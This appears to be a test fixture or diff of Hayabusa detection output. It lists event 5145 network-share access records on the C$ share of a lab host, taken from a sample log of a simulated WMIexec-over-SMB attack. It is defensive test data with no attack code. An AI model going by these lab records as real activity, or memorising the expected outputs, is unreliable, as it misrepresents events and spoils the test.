+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.048 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
